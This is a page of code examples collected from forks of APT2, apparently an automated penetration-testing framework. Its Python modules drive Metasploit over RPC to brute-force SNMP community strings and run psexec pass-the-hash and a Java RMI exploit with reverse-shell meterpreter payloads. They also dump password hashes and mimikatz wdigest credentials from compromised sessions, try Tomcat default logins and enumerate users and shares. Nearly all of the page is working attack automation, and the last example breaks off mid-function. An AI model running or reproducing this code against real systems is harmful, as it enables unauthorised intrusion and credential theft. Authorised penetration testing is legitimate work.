Exemplos de myMsf em Python

Exemplo n.º 1

Arquivo: msf_snmplogin.py Projeto: junk13/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    msf.execute("use auxiliary/scanner/snmp/snmp_login\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("set VERSION 2c")
                    msf.execute("run\n")
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is
                           None):
                        result = result + msf.getResult()

                    outfile = self.config[
                        "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                            10)
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*LOGIN SUCCESSFUL.*", result)
                    for part in parts:
                        callFire = True
                        # Add all relevant details
                        p = part.split()
                        comString = p[p.index("SUCCESSFUL:") + 1]
                        self.addVuln(
                            t, "snmpCred", {
                                "port": "161",
                                "message": str(part),
                                "communityString": comString,
                                "output": outfile.replace("/", "%2F")
                            })

            if callFire:
                self.fire("snmpCred")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 2

Arquivo: msf_psexec_pth.py Projeto: zamil2200/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=self.config['msfport'],
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                users = kb.get("host/" + t + "/user")
                for user in users:
                    hashes = kb.get("host/" + t + "/user/" + user +
                                    "/fullhash")
                    for passhash in hashes:
                        # verify we have not tested this host before
                        if not self.seentarget(t + user + passhash):
                            # add the new IP to the already seen list
                            self.addseentarget(t + user + passhash)
                            self.display.verbose(self.shortName +
                                                 " - Connecting to " + t)
                            msf.execute("use exploit/windows/smb/psexec\n")
                            # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
                            # msf.execute("set LHOST %s\n" % self.config['lhost'])
                            # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
                            # msf.execute("set LPORT 4444\n")
                            msf.execute("set RPORT 445\n")
                            msf.execute("set RHOST " + t + "\n")
                            msf.execute("set SMBUser " + user + "\n")
                            msf.execute("set SMBPass " + passhash + "\n")
                            msf.execute("exploit -j\n")
                            msf.sleep(int(self.config['msfexploitdelay']))

                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                    10)
                            result = msf.getResult()
                            Utils.writeFile(result, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

                            parts = re.findall(
                                ".*Meterpreter session (\d+) opened.*", result)
                            for part in parts:
                                self.fire("msfSession")
                                self.display.verbose("NEW session on : " + t)
                                kb.add("host/" + t + "/msfSession/" +
                                       str(part))

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 3

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("getuid\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
                            for line in text.splitlines():
                                m = re.match(r'^\s*Server username: (.*)\s*', line)
                                if (m):
                                    self.display.verbose("Metasploit Session [" + s +
                                            "] running as user [" + m.group(1).strip() + "]")

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("sysinfo\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
                            for line in text.splitlines():
                                m = re.match(r'^\s*OS\s\s*: (.*)\s*', line)
                                if (m):
                                    self.display.verbose("Metasploit Session [" + s +
                                            "] running on OS [" + m.group(1).strip() + "]")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 4

Arquivo: scan_msf_snmpenumusers.py Projeto: heikipikker/apt2-1

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("vuln/host/" + t +
                                        "/snmpCred/communityString")
                    for comString in comStrings:
                        myMsf.lock.acquire()
                        msf.execute(
                            "use auxiliary/scanner/snmp/snmp_enumusers\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("exploit\n")
                        msf.sleep(int(self.config['msfexploitdelay']))
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is
                               None):
                            result = result + msf.getResult()
                        myMsf.lock.release()

                        outfile = self.config[
                            "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" +
                               outfile.replace("/", "%2F"))

                        # Extract usernames from results and add to KB
                        parts = re.findall(".* users: .*", result)
                        for part in parts:
                            userlist = (part.split(':')[2]).split(',')
                            for username in userlist:
                                kb.add("creds/host/" + t + "/username/" +
                                       username.strip())

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 5

Arquivo: msf_dumphashes.py Projeto: zamil2200/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'],
                            port=self.config['msfport'],
                            user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("hashdump\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            # regex match on [^:]+:[^:]+:[^:]+:[^:]+:::
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("load mimikatz\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("wdigest\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 6

Arquivo: msf_smbuserenum.py Projeto: 0x0mar/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/smb/smb_enumusers\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("run\n")
                    # msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()

                    # TODO - process results and store user list to KB
                    # need to do something better with this.
                    #    loop over each user and store in the KB
                    #        if local, store in "/host/" + t + "/user/" + user
                    #        if domain, store in "/domain/" + domainname + "/user/" + user

                    # for now, just print out the results
                    # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras)
                    parts = re.findall(".*" + t.replace(".", "\.") + ".*", result)
                    for part in parts:
                        if "RHOSTS" in part:
                            pass
                        else:
                            try:
                                pieces = part.split()
                                domain = pieces[3]
                                kb.add("domain/" + domain.strip() + "/host/" + t)
                                extras = part.split('(')[1].split(')')[0]
                                users = part.split('[')[3].split(']')[0].split(',')
                                for user in users:
                                    kb.add("host/" + t + "/user/" + user.strip())
                            except:
                                pass
                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 7

Arquivo: post_msf_dumphashes.py Projeto: MooseDojo/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('shell/' + t + '/msf')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            myMsf.lock.acquire()
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("hashdump\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")
                            msf.sleep(int(self.config['msfexploitdelay']))

                            # TODO - process results and store results in KB
                            # regex match on [^:]+:[^:]+:[^:]+:[^:]+:::
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            myMsf.lock.release()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("load mimikatz\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("wdigest\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 8

Arquivo: exploit_msf_tomcat_mgr_login.py Projeto: heikipikker/apt2-1

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                ports = kb.get('service/http/' + t + '/tcp')
                for p in ports:
                    # verify we have not tested this host before
                    if not self.seentarget(t + p):
                        # add the new IP to the already seen list
                        self.addseentarget(t + p)
                        myMsf.lock.acquire()
                        self.display.verbose(self.shortName +
                                             " - Connecting to " + t)
                        msf.execute(
                            "use auxiliary/scanner/http/tomcat_mgr_login\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set RPORT %s\n" % p)
                        msf.execute("exploit -j\n")
                        msf.sleep(int(self.config['msfexploitdelay']))

                        outfile = self.config[
                            "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                10)
                        result = msf.getResult()
                        myMsf.lock.release()
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" +
                               outfile.replace("/", "%2F"))
                        for line in result.splitlines():
                            m = re.match(r'.*Successful: (.*):(.*)', line)
                            if (m):
                                self.display.error("Tomcat on [" + t + ":" +
                                                   p +
                                                   "] has default creds of [" +
                                                   m.group(1).strip() + "]/[" +
                                                   m.group(2).strip() + "]")
                                kb.add("creds/service/tomcat/" + t + "/tcp/" +
                                       p + "/username/" + m.group(1).strip() +
                                       "/password/" + m.group(2).strip())
                                self.fire("newTomcatPassword")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 9

Arquivo: msf_openx11.py Projeto: zamil2200/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    msf.execute("use auxiliary/scanner/x11/open_x11\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("run\n")
                    msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is
                           None):
                        result = result + msf.getResult()

                    outfile = self.config[
                        "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                            10)
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*Open X Server.*", result)
                    for part in parts:
                        callFire = True
                        self.addVuln(
                            t, "openX11", {
                                "port": "6000",
                                "message": str(part),
                                "output": outfile.replace("/", "%2F")
                            })

            # Nothing to trigger?
            if callFire:
                self.fire("x11Access")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 10

Arquivo: msf_snmpenumshares.py Projeto: junk13/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("host/" + t +
                                        "/vuln/snmpCred/communityString")
                    for comString in comStrings:
                        msf.execute(
                            "use auxiliary/scanner/snmp/snmp_enumshares\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("run\n")
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is
                               None):
                            result = result + msf.getResult()

                        outfile = self.config[
                            "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                                10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" +
                               outfile.replace("/", "%2F"))

                        #  Don't need to parse out IP, we are running module one IP at a time
                        # Just find lines with  -  and pull out share name
                        parts = re.findall(".* - .*", result)
                        for part in parts:
                            sharename = (part.split('-')[0]).strip()
                            kb.add("host/" + t + "/share/smb/" + sharename)

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 11

Arquivo: exploit_msf_javarmi.py Projeto: MooseDojo/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)

                    myMsf.lock.acquire()

                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use exploit/multi/misc/java_rmi_server\n")
                    msf.execute("set RHOST %s\n" % t)
                    #msf.execute("set TARGET 0\n")
                    msf.execute("set TARGET 2\n")
                    msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp") 
                    msf.execute("set LPORT 4445\n")
                    msf.execute("exploit -j\n")
                    msf.sleep(int(self.config['msfexploitdelay']))

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    result = msf.getResult()

                    myMsf.lock.release()

                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*Meterpreter session.*", result)
                    for part in parts:
                        callFire = True
                        self.addVuln(t, "JavaRMI", {"port": "1099", "output": outfile.replace("/", "%2F")})

            if callFire:
                self.fire("msfSession")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 12

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    msf.execute("use exploit/multi/misc/java_rmi_server\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("set TARGET 0\n")
                    msf.execute("set PAYLOAD java/meterpreter/reverse_tcp\n")
                    msf.execute("run\n")
                    msf.sleep(5)

                    outfile = self.config[
                        "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                            10)
                    result = msf.getResult()
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*Meterpreter session.*", result)
                    for part in parts:
                        callFire = True
                        self.addVuln(t, "JavaRMI", {
                            "port": "1099",
                            "output": outfile.replace("/", "%2F")
                        })

            if callFire:
                self.fire("msfSession")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 13

Arquivo: msf_gathersessioninfo.py Projeto: junk13/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'],
                            port=self.config['msfport'],
                            user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("getuid\n")
                            msf.execute("background\n")

                            # TODO - process results and store dat to KB
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("sysinfo\n")
                            msf.execute("background\n")

                            # TODO - process results and store dat to KB
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 14

Arquivo: msf_psexec_pth.py Projeto: HMSH00D/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                users = kb.get("host/" + t + "/user")
                for user in users:
                    hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash")
                    for passhash in hashes:
                        # verify we have not tested this host before
                        if not self.seentarget(t+user+passhash):
                            # add the new IP to the already seen list
                            self.addseentarget(t+user+passhash)
                            self.display.verbose(self.shortName + " - Connecting to " + t)
                            msf.execute("use exploit/windows/smb/psexec\n")
                            # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
                            # msf.execute("set LHOST %s\n" % self.config['lhost'])
                            # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
                            # msf.execute("set LPORT 4444\n")
                            msf.execute("set RPORT 445\n")
                            msf.execute("set RHOST " + t + "\n")
                            msf.execute("set SMBUser " + user + "\n")
                            msf.execute("set SMBPass " + passhash + "\n")
                            msf.execute("exploit -j\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
        
                            outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                            result = msf.getResult()
                            Utils.writeFile(result, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        
                            parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                            for part in parts:
                                self.fire("msfSession")
                                self.display.verbose("NEW session on : " + t)
                                kb.add("host/" + t + "/msfSession/" + str(part))
        
            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 15

Arquivo: msf_snmplogin.py Projeto: HMSH00D/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/snmp/snmp_login\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("set VERSION 2c\n")
                    msf.execute("run\n")
                    msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*LOGIN SUCCESSFUL.*", result)
                    for part in parts:
                        callFire = True
                        # Add all relevant details
                        p = part.split()
                        comString = p[p.index("SUCCESSFUL:") + 1]
                        self.addVuln(t, "snmpCred", {"port": "161", "message": str(part), "communityString": comString,
                                                     "output": outfile.replace("/", "%2F")})

            if callFire:
                self.fire("snmpCred")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 16

Arquivo: scan_msf_snmpenumshares.py Projeto: MooseDojo/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString")
                    for comString in comStrings:
                        myMsf.lock.acquire()
                        msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("exploit\n")
                        msf.sleep(int(self.config['msfexploitdelay']))
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is None):
                            result = result + msf.getResult()
                        myMsf.lock.release()

                        outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                        #  Don't need to parse out IP, we are running module one IP at a time
                        # Just find lines with  -  and pull out share name
                        parts = re.findall(".* - .*", result)
                        for part in parts:
                            sharename = (part.split('-')[0]).strip()
                            kb.add("share/smb/" + t + "/" + sharename)

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 17

Arquivo: scan_msf_openx11.py Projeto: MooseDojo/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    myMsf.lock.acquire()
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/x11/open_x11\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("exploit\n")
                    msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()
                    myMsf.lock.release()

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*Open X Server.*", result)
                    for part in parts:
                        callFire = True
                        self.addVuln(t, "openX11",
                                     {"port": "6000", "message": str(part), "output": outfile.replace("/", "%2F")})

            # Nothing to trigger?
            if callFire:
                self.fire("x11Access")

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 18

Arquivo: msf_gathersessioninfo.py Projeto: 0x0mar/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("getuid\n")
                            msf.execute("background\n")

                            # TODO - process results and store dat to KB
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("sysinfo\n")
                            msf.execute("background\n")

                            # TODO - process results and store dat to KB
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return

Exemplo n.º 19

Arquivo: msf_snmpenumusers.py Projeto: HMSH00D/apt2

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString")
                    for comString in comStrings:
                        msf.execute("use auxiliary/scanner/snmp/snmp_enumusers\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("run\n")
